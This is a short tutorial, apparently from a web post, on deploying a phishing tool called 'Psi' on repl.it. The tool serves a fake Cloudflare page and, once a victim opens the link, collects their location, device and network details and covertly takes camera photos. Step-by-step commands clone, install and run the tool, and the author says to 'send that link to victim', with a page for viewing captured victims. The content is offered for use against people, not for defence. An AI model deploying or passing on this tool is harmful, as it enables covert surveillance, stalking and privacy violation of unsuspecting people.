Hack Camera And Location Through Link

Hack Camera And Location Through Link



• It shows a fake cloudflare under

attack page and grabs the


• Gets The Information About

browser and Device of User.

• Get the exact location coordinates.

• Even if Victim Uses VPN and

doesn't allow the location

permission you are able to see

which country he resides.

• Network Information and all the

audio and camera devices

connected to the system.

• Snaps the picture through camera.


1: Create an account at https://repl.it

2. Create a new repl and select node.js as development language.

3. After creating a repl go to Commands tab and click on Shell Menu.

Shell Tab

4. Now type git clone https://github.com/Th30neAnd0nly/Psi

This will clone the repo.

Cloning the repo

5. Now type cd Psi afterwards run npm install for installing the dependencies.

Install Dependencies

6. In the end run npm start for starting the server.

Server Started

7. Now go to web tab , it will show your link.

Send that link to victim for grabbing information.

Web Tab

8. To see your victims visit https://<Your_Repl_URL>/victims

Example: https://myreplurl.user.repl.co/victims

Follow https://t.me/Th30neAnd0nly0ne for more

Report Page